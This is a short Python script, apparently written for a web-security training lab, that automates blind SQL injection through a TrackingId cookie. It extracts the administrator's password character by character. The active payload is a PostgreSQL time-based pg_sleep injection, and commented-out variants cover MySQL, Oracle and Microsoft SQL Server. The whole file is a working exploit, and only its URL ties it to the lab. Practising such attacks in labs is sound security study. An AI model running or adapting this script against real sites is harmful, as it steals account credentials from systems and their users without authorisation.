blindSQLi.py

import sys
import time
import requests

url = 'https://ac401f451e11facb80e02456000600bc.web-security-academy.net/'

abc = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-.$@!?}{'
passwd = ''

for i in range (len(passwd)+1, 100):
    for j in range (0, len(abc)):
        # mysql substring
        #cookies = dict(TrackingId="' or (SELECT SUBSTRING(password,%s,1) FROM users WHERE username='administrator')='%s" % (i, abc[j]))
        
        # Oracle div 0
        # cookies = dict(TrackingId="'union SELECT CASE WHEN (username ='administrator' and substr(password,%s,1)='%s') THEN to_char(1/0) ELSE NULL END FROM users--" % (i, abc[j]))

        # Microsoft substring
        # cookies = dict(TrackingId="'union select 'a' from users where username ='administrator' and substring(password,%s,1)='%s'--" % (i, abc[j]))
        
        # PostgreSQL sleep
        cookies = dict(TrackingId="'" + '%3B'+ "SELECT CASE WHEN (username ='administrator' and substring(password,%s,1)='%s') THEN pg_sleep(5) ELSE NULL END from users--" % (i, abc[j]))
        
        start = time.time()
        r = requests.get(url, cookies=cookies)
        # if 'Welcome' in r.text:
        # if len(r.text) < 30:
        if time.time() - start > 5:
            passwd += abc[j]
            print("\r" + passwd)
            break
        if j == len(abc)-1:
            print(":flag:")
            sys.exit()